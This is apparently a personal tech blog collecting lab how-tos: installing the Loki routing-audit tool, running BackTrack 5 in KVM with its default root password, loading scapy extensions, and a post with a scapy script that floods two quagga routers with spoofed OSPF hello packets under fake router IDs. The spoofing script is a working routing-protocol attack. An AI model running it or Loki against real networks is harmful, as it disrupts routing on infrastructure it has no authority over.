lost and found ( for me ? )

how to install Loki 0.2.7 on Ubuntu 11.04 x86_64


In brief , Loki is layer 3 routing auditing tools.
Here’s an explanation of how to install Loki on Ubunut 11.04 Desktop 64bit.
# lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 11.04
Release:        11.04
Codename:       natty

# uname -ri
2.6.38-16-generic x86_64


download pylibpcap 0.6.2-1 and Loki 0.2.7 deb packages for Ubuntu 11.04 64bit from http://c0decafe.de/loki.html
many thx :D
# ls
loki_0.2.7-1_amd64.deb  pylibpcap_0.6.2-1_amd64.deb


instll pylibpcap
# dpkg -i pylibpcap_0.6.2-1_amd64.deb


install loki
# dpkg -i loki_0.2.7-1_amd64.deb
(Reading database ... 154621 files and directories currently installed.)
Preparing to replace loki 0.2.7-1 (using loki_0.2.7-1_amd64.deb) ...
Unpacking replacement loki ...
dpkg: dependency problems prevent configuration of loki:
loki depends on libdumbnet1 (>= 1.8); however:
 Package libdumbnet1 is not installed.
loki depends on python-dpkt; however:
 Package python-dpkt is not installed.
loki depends on python-dumbnet; however:
 Package python-dumbnet is not installed.
loki depends on python-ipy; however:
 Package python-ipy is not installed.
dpkg: error processing loki (--install):
dependency problems - leaving unconfigured
Errors were encountered while processing:
loki


install required packages
# apt-get install -y libdumbnet1 python-dpkt python-dumbnet python-ipy


install loki again
Okay , I could install loki.
# dpkg -i loki_0.2.7-1_amd64.deb
(Reading database ... 154720 files and directories currently installed.)
Preparing to replace loki 0.2.7-1 (using loki_0.2.7-1_amd64.deb) ...
Unpacking replacement loki ...
Setting up loki (0.2.7-1) ...
Processing triggers for python-support ...

# apt-cache policy loki
loki:
 Installed: 0.2.7-1
 Candidate: 2.4.7.4-4
 Version table:
    2.4.7.4-4 0
       500 http://jp.archive.ubuntu.com/ubuntu/ natty/universe amd64 Packages
*** 0.2.7-1 0
       100 /var/lib/dpkg/status

# dpkg -L loki
/.
/usr
/usr/lib
/usr/lib/pyshared
/usr/lib/pyshared/python2.7
/usr/lib/pyshared/python2.7/loki_bindings
/usr/lib/pyshared/python2.7/loki_bindings/ospfmd5
/usr/lib/pyshared/python2.7/loki_bindings/ospfmd5/ospfmd5bf.so
/usr/lib/pyshared/python2.7/loki_bindings/mpls
/usr/lib/pyshared/python2.7/loki_bindings/mpls/mplstun.so
/usr/lib/pyshared/python2.7/loki_bindings/mpls/mplsred.so
/usr/lib/pyshared/python2.7/loki_bindings/tcpmd5
/usr/lib/pyshared/python2.7/loki_bindings/tcpmd5/tcpmd5.so
/usr/lib/pyshared/python2.7/loki_bindings/tcpmd5/tcpmd5bf.so
/usr/lib/pyshared/python2.7/loki_bindings/asleap
/usr/lib/pyshared/python2.7/loki_bindings/asleap/asleap.so
/usr/share
/usr/share/pyshared
/usr/share/pyshared/loki_bindings-0.2.egg-info
/usr/share/pyshared/loki_bindings
/usr/share/pyshared/loki_bindings/ospfmd5
/usr/share/pyshared/loki_bindings/ospfmd5/__init__.py
/usr/share/pyshared/loki_bindings/__init__.py
/usr/share/pyshared/loki_bindings/mpls
/usr/share/pyshared/loki_bindings/mpls/__init__.py
/usr/share/pyshared/loki_bindings/tcpmd5
/usr/share/pyshared/loki_bindings/tcpmd5/__init__.py
/usr/share/pyshared/loki_bindings/asleap
/usr/share/pyshared/loki_bindings/asleap/__init__.py
/usr/share/doc
/usr/share/doc/loki
/usr/share/doc/loki/README.Debian
/usr/share/doc/loki/copyright
/usr/share/doc/loki/changelog.Debian.gz
/usr/share/loki
/usr/share/loki/modules
/usr/share/loki/modules/module_ospf.py
/usr/share/loki/modules/module_dot1q.py
/usr/share/loki/modules/module_dot1q.glade
/usr/share/loki/modules/module_ldp.glade
/usr/share/loki/modules/module_bfd.glade
/usr/share/loki/modules/module_wlccp.py
/usr/share/loki/modules/module_mpls.glade
/usr/share/loki/modules/module_eigrp.glade
/usr/share/loki/modules/module_hsrp.py
/usr/share/loki/modules/module_hsrp2.py
/usr/share/loki/modules/module_hsrp.glade
/usr/share/loki/modules/module_icmp6.glade
/usr/share/loki/modules/module_wlccp.glade
/usr/share/loki/modules/module_arp.glade
/usr/share/loki/modules/module_icmp6.py
/usr/share/loki/modules/module_vrrp.glade
/usr/share/loki/modules/module_bgp.py
/usr/share/loki/modules/module_bgp.glade
/usr/share/loki/modules/module_bfd.py
/usr/share/loki/modules/module_ldp.py
/usr/share/loki/modules/module_vrrp.py
/usr/share/loki/modules/module_mpls.py
/usr/share/loki/modules/module_tcp-md5.py
/usr/share/loki/modules/module_rip.py
/usr/share/loki/modules/module_hsrp2.glade
/usr/share/loki/modules/mac.txt
/usr/share/loki/modules/module_arp.py
/usr/share/loki/modules/module_ospf.glade
/usr/share/loki/modules/module_rip.glade
/usr/share/loki/modules/module_eigrp.py
/usr/share/loki/modules/module_tcp-md5.glade
/usr/share/python-support
/usr/share/python-support/loki.public
/usr/share/python-support/loki.private
/usr/bin
/usr/bin/mpls_tunnel
/usr/bin/loki.py


start loki.py
please note that you need to be root user when running loki.py script.
# loki.py




install BackTrack Linux 5 R3 x86_64 (BT5R3 ) within KVM

Here's an explanation of how to install BackTrack Linux 5 R3 within KVM 

KVM host info

# lsb_release -a
No LSB modules are available.
Distributor ID: LinuxMint
Description:    Linux Mint 12 Lisa
Release:        12
Codename:       lisa

# uname -ri
3.2.0-33-generic x86_64

# libvirtd --version
libvirtd (libvirt) 0.9.8

# kvm --version
QEMU emulator version 1.0 (qemu-kvm-1.0), Copyright (c) 2003-2008 Fabrice Bellard


install BT5R3 with virt-manager.
BT5R3 is Ubuntu 12.04 base.



boot BT



after booting the BT , type startx



click “Install BackTrack”



installing BT into HDD





after booting BT from vDHH.

user : root
credential : toor




[ allow ssh access ]

generate SSH key

root@bt:~# sshd-generate


start ssh daemon
root@bt:~# /etc/init.d/ssh start


[ how to access to BT via virsh console ]

add a serial port on BT VM , if you have not added to

on the KVM host
virsh # dumpxml BT5

   <serial type='pty'>
     <source path='/dev/pts/16'/>
     <target port='0'/>
     <alias name='serial0'/>
   </serial>


make /etc/init/ttyS0.conf on the BT VM
root@bt:~# cat /etc/init/ttyS0.conf
start on stopped rc RUNLEVEL=[2345]
stop on runlevel [!2345]

respawn
exec /sbin/getty -L 115200 ttyS0 vt102


edit /boot/grub/menu.lst

add writable permission
root@bt:~# chmod u+w /boot/grub/grub.cfg


edit grub.cfg
add red lines.
serial -speed=115200 -unit=0 -word=8 -parity=no -stop=1
terminal -timeout=10 serial

menuentry 'Ubuntu, with Linux 3.2.6' --class ubuntu --class gnu-linux --class gnu --class os {
       recordfail
       insmod ext2
       set root='(hd0,1)'
       search --no-floppy --fs-uuid --set 818802dc-9073-4b13-93a8-046e382edb46
       linux   /boot/vmlinuz-3.2.6 root=UUID=818802dc-9073-4b13-93a8-046e382edb46 ro   text splash vga=791 console=ttyS0,115200n8
       initrd  /boot/initrd.img-3.2.6
}


reboot the BT

connect to the BT5 VM over virsh console
virsh # console BT5
Connected to domain BT5
Escape character is ^]

BackTrack 5 R3 - 64 Bit bt ttyS0
bt login: root
Password:
Last login: Tue Nov 27 22:40:14 JST 2012 on ttyS0

send OSPF hello packets with scapy

Here’s an explanation of how to send OSPF hello packets with scapy.
I just referred to http://blog.egofuzzer.net/2011/04/ospfs-evil-neighbor.html.
many , many thanks !


                192.168.0.0/24 ,  
area 0.0.0.0 , no authentication
quagga1 0.254  ---------vSW -------- 0.253 quagga2
                     |
                    0.30
              scapy machine ( sends OSPF hello )


I’ve already configured OSPF relationship between quagga1 and quagga2.
On the scapy box ( ubuntu 12.04 ) , get an OSPF hello packet with scapy to make a crafted OSPF hello packet.

sniff OSPF hello packets.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> load_contrib('ospf')

>>> sniff(filter="ip dst 224.0.0.5",count=1)
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>

>>> _[0].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 52:54:00:d4:ab:3e
 type= 0x800
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 68
    id= 56607
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x39d6
    src= 192.168.0.254 <- quagga1
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 48
       src= 192.168.1.254
       area= 0.0.0.0
       chksum= 0xf300
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.0.253
          backup= 192.168.0.254
          neighbors= ['192.168.2.254']
>>>


save above hello packet as a pcap file.
>>> wrpcap("ospf_hello.pcap",_[0])

# tshark -r ospf_hello.pcap -p ospf
Running as user "root" and group "root". This could be dangerous.
 1   0.000000 192.168.0.254 -> 224.0.0.5    OSPF 82 Hello Packet


this script will send 10 OSPF hello packets
# cat send_ospf_hello.py
#!/usr/bin/env python
from scapy.all import *

load_contrib('ospf')

pkts=rdpcap('ospf_hello.pcap')
h=pkts[0]
for i in range(0,200):
       for j in range(1,100):
               host="192.168.%s.%s" % (i,j)
               h[IP].src="192.168.0.30"
               h[IP].chksum=None
               h[OSPF_Hdr].src=host
               h[OSPF_Hdr].chksum=None
               h[OSPF_Hello].router=host
               h[OSPF_Hello].backup="192.168.0.254"
               h[OSPF_Hello].neighbor="192.168.0.254"
               sendp(h, verbose=1)


send OSPF packets
# ./send_ospf_hello.py
WARNING: No route found for IPv6 destination :: (no default route?)
.
Sent 1 packets.
<snip>


before sending crafted OSPF hello packets.
quagga1# show  ip ospf  neighbor

   Neighbor ID Pri State           Dead Time Address         Interface
  RXmtL RqstL DBsmL
192.168.2.254     1 Full/DR           35.435s 192.168.0.253   eth0:192.168.0.254
      1     0     0
quagga1#


while sending crafted hello packets.
quagga1# show  ip ospf  neighbor

   Neighbor ID Pri State           Dead Time Address         Interface
  RXmtL RqstL DBsmL
192.168.68.78     1 Init/DROther      39.997s 192.168.0.30    eth0:192.168.0.254
      0     0     0
192.168.2.254     1 Full/DR           39.250s 192.168.0.253   eth0:192.168.0.254
      0     0     0

quagga1# show  ip ospf  neighbor

   Neighbor ID Pri State           Dead Time Address         Interface
  RXmtL RqstL DBsmL
192.168.72.10     1 Init/DROther      39.998s 192.168.0.30    eth0:192.168.0.254
      0     0     0
192.168.2.254     1 Full/DR           38.442s 192.168.0.253   eth0:192.168.0.254
      0     0     0
quagga1#

# tshark -r crafted_ospf.pcap -R '(ip.addr==192.168.0.30)' | head -5
 2   1.779586 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 3   1.781786 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 4   1.783419 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 5   1.785150 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet
 6   1.787003 192.168.0.30 -> 224.0.0.5    OSPF Hello Packet

python scapy : how to load extension modules with load_contrib() on Ubuntu 12.04

Here’s an explanation of how to load scapy extension modules with load_contrib().

# lsb_release –a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.1 LTS
Release:        12.04
Codename:       precise

# uname -ri
3.2.0-33-virtual x86_64

# python --version
Python 2.7.3

# apt-cache policy python-scapy
python-scapy:
 Installed: 2.2.0-1
 Candidate: 2.2.0-1
 Version table:


after installing python-scapy with apt-get and trying to load modules with load_contrib() , I saw the following error.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)

>>> load_contrib('ospf')
ERROR: No module named contrib.ospf

>>> list_contrib()
>>>


[ how to load extension modules with load_contrib() ]

download python file you want to use from http://trac.secdev.org/scapy/browser/scapy/contrib/
# head -5 ospf.py
#!/usr/bin/env python
# scapy.contrib.description = OSPF
# scapy.contrib.status = loads
"""
OSPF extension for Scapy <http://www.secdev.org/scapy>


make “contrib” directory.
# mkdir /usr/lib/python2.7/dist-packages/scapy/contrib


copy ospf.py into  /usr/lib/python2.7/dist-packages/scapy/contrib/ directory.
# cp ospf.py /usr/lib/python2.7/
dist-packages/scapy/contrib/

# ls /usr/lib/python2.7/dist-packages/scapy/contrib/
ospf.py


run scapy
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> list_contrib()
ospf                : OSPF                                     status=loads
>>>


load ospf . nn , error
>>> load_contrib('ospf')
ERROR: No module named contrib.ospf


Oops , I forgot making __init__.py file under /usr/lib/python2.7/dist-packages/scapy/contrib/ directory.
# touch /usr/lib/python2.7/dist-
packages/scapy/contrib/__init__.py


try again.
# scapy
INFO: No IPv6 support in kernel
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> load_contrib('ospf')


capture OSPF packets.
>>> load_contrib('ospf')
>>> sniff(filter="ip dst 224.0.0.5",count=1)
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:1>
>>> _[0].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 52:54:00:d4:ab:3e
 type= 0x800
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 68
    id= 56122
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x3bbb
    src= 192.168.0.254
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 48
       src= 192.168.1.254
       area= 0.0.0.0
       chksum= 0xf300
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.0.253
          backup= 192.168.0.254
          neighbors= ['192.168.2.254']
>>>

python scapy : how to use extension modules

Here's an explanation of how to use scapy extension module , called scapy_ospf.py.

just referred to http://trac.secdev.org/scapy/wiki/OSPF
many thx xD.


# lsb_release -a
No LSB modules are available.
Distributor ID: LinuxMint
Description:    Linux Mint 12 Lisa
Release:        12
Codename:       lisa

# uname -ri
3.2.0-33-generic x86_64

# python --version
Python 2.7.3

# apt-cache policy python-scapy
python-scapy:
 Installed: 2.2.0-1
 Candidate: 2.2.0-1
 Version table:
*** 2.2.0-1 0
       500 http://archive.ubuntu.com/ubuntu/ precise/universe amd64 Packages
       100 /var/lib/dpkg/status


If you have not installed python-scapy , please install it via apt-get
# apt-get install –y python-scapy


download an extention module , which is called scapy_ospf-v0.92.py , from http://trac.secdev.org/scapy/attachment/ticket/163/scapy_ospf-v0.92.py
# chmod u+x scapy_ospf-v0.92.py


download ospf.cap from http://wiki.wireshark.org/SampleCaptures
# ls
ospf.cap  scapy_ospf-v0.92.py


run scapy_ospf-v0.92.py
# ./scapy_ospf-v0.92.py
Welcome to Scapy (2.2.0)
OSPF extension v0.9.2
>>>


load ospf.cap
>>> cap1=rdpcap("ospf.cap")
>>> cap1.nsummary()
0000 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0001 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0002 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0003 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0004 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0005 Ether / 192.168.170.8 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
0006 Ether / 192.168.170.2 > 224.0.0.5 ospf / OSPF_Hdr / OSPF_Hello
<snip>


have a look at packet #1.
>>> cap1[1].show()
###[ Ethernet ]###
 dst= 01:00:5e:00:00:05
 src= 00:e0:18:b1:0c:ad
 type= IPv4
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0xc0
    len= 64
    id= 2067
    flags=
    frag= 0L
    ttl= 1
    proto= ospf
    chksum= 0x65dc
    src= 192.168.170.8
    dst= 224.0.0.5
    \options\
###[ OSPF Header ]###
       version= 2
       type= Hello
       len= 44
       src= 192.168.170.8
       area= 0.0.0.1
       chksum= 0x273b
       authtype= Null
       authdata= 0x0
###[ OSPF Hello ]###
          mask= 255.255.255.0
          hellointerval= 10
          options= E
          prio= 1
          deadinterval= 40
          router= 192.168.170.8
          backup= 0.0.0.0
          neighbors= []
>>>


check OSPF header of packet #1.
>>> cap1[1][OSPF_Hdr].command()
"OSPF_Hdr(src='192.168.170.8', authtype=0, keyid=None, reserved=None, seq=None, area='0.0.0.1', authdatalen=None, authdata=0, len=44, version=2, chksum=10043, type=1)/OSPF_Hello(hellointerval=10, prio=1, mask='255.255.255.0', deadinterval=40, router='192.168.170.8', backup='0.0.0.0', options=2L)"


make OSPF packets
>>> p=IP()/OSPF_Hdr()/OSPF_LSReq(requests=[OSPF_LSReq_Item()])

>>> p.show()
###[ IP ]###
 version= 4
 ihl= None
 tos= 0x0
 len= None
 id= 1
 flags=
 frag= 0
 ttl= 64
 proto= ospf
 chksum= None
 src= 127.0.0.1
 dst= 127.0.0.1
 \options\
###[ OSPF Header ]###
    version= 2
    type= LSReq
    len= None
    src= 1.1.1.1
    area= 0.0.0.0
    chksum= None
    authtype= Null
    authdata= 0x0
###[ OSPF Link State Request (container) ]###
       \requests\
        |###[ OSPF Link State Request (item) ]###
        |  type= router
        |  id= 1.1.1.1
        |  adrouter= 1.1.1.1

>>> q=IP()/OSPF_Hdr()/OSPF_LSUpd(lsalist=[OSPF_Router_LSA(id='1.1.1.1'), OSPF_Router_LSA(id='2.2.2.2')])

>>> tshark(q)
###[ Ethernet ]###
 dst= 00:1b:54:92:fe:1f
 src= 68:b5:99:7c:94:38
 type= IPv4
###[ IP ]###
    version= 4L
    ihl= 5L
    tos= 0x0
    len= 136
    id= 37346
    flags= DF
    frag= 0L
    ttl= 64
    proto= tcp
    chksum= 0x3794
    src= 172.30.68.75
    dst= 10.41.118.103
    \options\
###[ TCP ]###
       sport= ssh
       dport= 56938
       seq= 3269663846
       ack= 3358998394
       dataofs= 5L
       reserved= 0L
       flags= PA
       window= 193
       chksum= 0x7174
       urgptr= 0
       options= []
###[ Raw ]###
          load= '\xd1\xf7\xdf\xe9]\x80\xc7\xf4Go\xa66E\xc0\xc2\x96|\x9c#\xd8\xdd\xab\xc4>\x0c\xf3\xe0\xfcIx\xfa\x96\x80\xdb\xa1?P\x1d\xe9\x16\x9f(% #<\xf3\xe3\xef\x0f\xb6\x04\x99\xcfG$\x11\xb4\x86\x99\xab\x0fx\xb5\x9b\xd9=\xe4\xfb\x85H\xb5\x9cHJ\x17\xcd\x89\x8fMED\xb3]\x123ah7\xc1>\xaf\x08j\xa43'
Traceback (most recent call last):
 File "<console>", line 1, in <module>
 File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 602, in tshark
   sniff(prn=lambda x: x.display(),*args,**kargs)
 File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 591, in sniff
   if count > 0 and c >= count:
 File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 667, in __gt__
   raise TypeError((self, other))
TypeError: (<IP  proto=ospf |<OSPF_Hdr  type=LSUpd |<OSPF_LSUpd  lsalist=[<OSPF_Router_LSA  id=1.1.1.1 |>, <OSPF_Router_LSA  id=2.2.2.2 |>] |>>>, 0)
>>>


how to check what kind of methods you can you.
>>> lsc()
arpcachepoison      : Poison target's cache with (your MAC,victim's IP) couple
arping              : Send ARP who-has requests to determine which hosts are up
bind_layers         : Bind 2 layers on some specific fields' values
<snip>

>>> ls()
ARP        : ARP
ASN1_Packet : None
BOOTP      : BOOTP
CookedLinux : cooked linux
DHCP       : DHCP options
DHCP6      : DHCPv6 Generic Message)
<snip>

>>> ls(OSPF_Hdr)
version    : ByteField            = (2)
type       : ByteEnumField        = (1)
len        : ShortField           = (None)
src        : IPField              = ('1.1.1.1')
area       : IPField              = ('0.0.0.0')
chksum     : XShortField          = (None)
authtype   : ShortEnumField       = (0)
authdata   : ConditionalField     = (0)
reserved   : ConditionalField     = (0)
keyid      : ConditionalField     = (1)
authdatalen : ConditionalField     = (0)
seq        : ConditionalField     = (0)